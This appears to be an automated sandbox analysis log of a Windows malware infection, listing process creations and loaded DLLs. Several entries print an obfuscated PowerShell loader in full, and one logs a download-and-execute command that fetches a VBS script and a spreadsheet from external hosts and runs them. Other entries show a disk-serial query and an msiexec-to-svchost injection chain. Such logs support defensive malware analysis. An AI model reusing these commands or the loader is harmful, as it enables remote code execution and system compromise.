S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelB
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8548.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a9b905ba/4a1b3c1a"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2044,i,7050312462197299471,10248190521598653203,262144 /prefetch:8
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\lsm5k8gou5bjv.xlsx"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelBJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8548.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a9b905ba/4a1b3c1a"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2044,i,7050312462197299471,10248190521598653203,262144 /prefetch:8
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
